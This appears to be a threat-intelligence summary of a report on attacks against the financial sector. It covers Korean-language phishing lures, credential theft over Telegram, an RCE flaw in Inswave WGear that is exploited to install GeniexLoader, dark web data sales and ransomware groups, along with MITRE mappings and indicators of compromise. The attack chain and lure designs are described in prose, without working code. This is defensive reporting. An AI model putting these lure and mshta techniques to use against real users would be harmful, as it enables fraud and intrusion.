The article highlights phishing, backdoor-downloader-dropper, and infostealer-ransomware activity targeting the financial sector, with Korean-language lure files, Telegram-based credential theft, and confirmed exploitation of the WGear RCE vulnerability. It also covers dark web sales of financial data and access, plus ransomware activity linked to groups such as Andariel, BlueNoroff, ShinyHunters, Everest, Prinz Eugen, and Qilin. #WGear #GeniexLoader #Andariel #BlueNoroff #ShinyHunters #Everest #PrinzEugen #Qilin
Keypoints
- Attack Stage 1 phishing, Stage 2 backdoor-downloader-dropper, and Stage 3 infostealer-ransomware were identified as the top malware patterns in the financial sector.
- Korean phishing and malware distribution used disguised file names such as work documents, tax/payment proofs, HR documents, and contract-related lures to build trust.
- Stolen login IDs and passwords from phishing emails were leaked to attackers through the Telegram API, and January compromises in Korea’s financial sector accounted for 2% of the total.
- KISA disclosed an RCE vulnerability in Inswave WGear version 1.100.7.0205 and earlier, and a real-world attack chain used mshta, external HTML, and additional payloads to install GeniexLoader.
- Dark web and forum activity included sales of customer data, account lists, and access for banks and financial firms, including Santander Bank, Deutsche Bank, Banco do Brasil, and others.
- Ransomware releases attributed to Everest, Prinz Eugen, and Qilin involved victims such as Citizens Bank, Standard Bank, and Manulife Wealth & Asset Management.
- Access sales included root access to a Linux firewall, core API access, and IDOR access to financial firms, showing ongoing risk of breaches, ransomware, and fraud.
MITRE Techniques
- [T1566.001 ] Phishing: Spearphishing Attachment – Used malicious email attachments and HTML files disguised as invoices, notices, and work documents to induce trust (‘work documents, tax and payment proofs, and HR and contract documents’).
- [T1566.002 ] Phishing: Spearphishing Link – Sent phishing emails with malicious links to a login page to capture credentials (‘phishing emails with keywords such as remittance, receipt, voicemail, malicious links, and HTML files were sent to the login page’).
- [T1001 ] Data Obfuscation – Used Telegram API and chat rooms as an exfiltration channel for stolen credentials (‘the entered account ID and password were sent to the threat actor’s Telegram chat room’).
- [T1105 ] Ingress Tool Transfer – Downloaded additional payloads from external HTML and then executed them (‘which then downloaded and executed additional payloads’).
- [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – Executed a .bat file as part of malware delivery (‘RFQ-097970-H2551-NO-20897–0976-order.bat’).
- [T1218.005 ] System Binary Proxy Execution: Mshta – Used mshta to launch external HTML and continue the attack chain (‘a WGear process executed mshta to call external HTML’).
- [T1204 ] User Execution – Relied on users opening deceptive files and documents to trigger infection (‘disguised them as work documents’).
- [T1068 ] Exploitation for Privilege Escalation – Abused the WGear RCE flaw to remotely execute arbitrary code (‘allows threat actors to remotely execute arbitrary code’).
Indicators of Compromise
- [File names ] Korean phishing and malware lure files – RFQ-097970-H2551-NO-20897–0976-order.bat, -송금내역NoticeSecure.htm, and other disguised document names
- [File names ] Additional lure/executable files – 단가인상문–**260413-1.pdf, RemittanceDetailedInformationSecure.htm, and Resume260407I will be a candidate who is sincere and consistent in all things.exe
- [MD5 hashes ] Identified distribution files – 15adac4d6fc1bddb0c940cdc0c6605b4, 53636c80d43a3c461dc8a3d2a2f2d4e1, and 3 more hashes
- [Software/version ] Vulnerable banking software – Inswave WGear version 1.100.7.0205 and earlier
- [Organizations ] Victim and target organizations mentioned in dark web and ransomware activity – Santander Bank, Deutsche Bank, Banco do Brasil, Citizens Bank, Standard Bank, and Manulife Wealth & Asset Management
- [Threat actors/groups ] Actors and marketplaces mentioned in the report – Andariel, BlueNoroff, ShinyHunters, Everest, Prinz Eugen, and Qilin
Read more: https://asec.ahnlab.com/en/93805/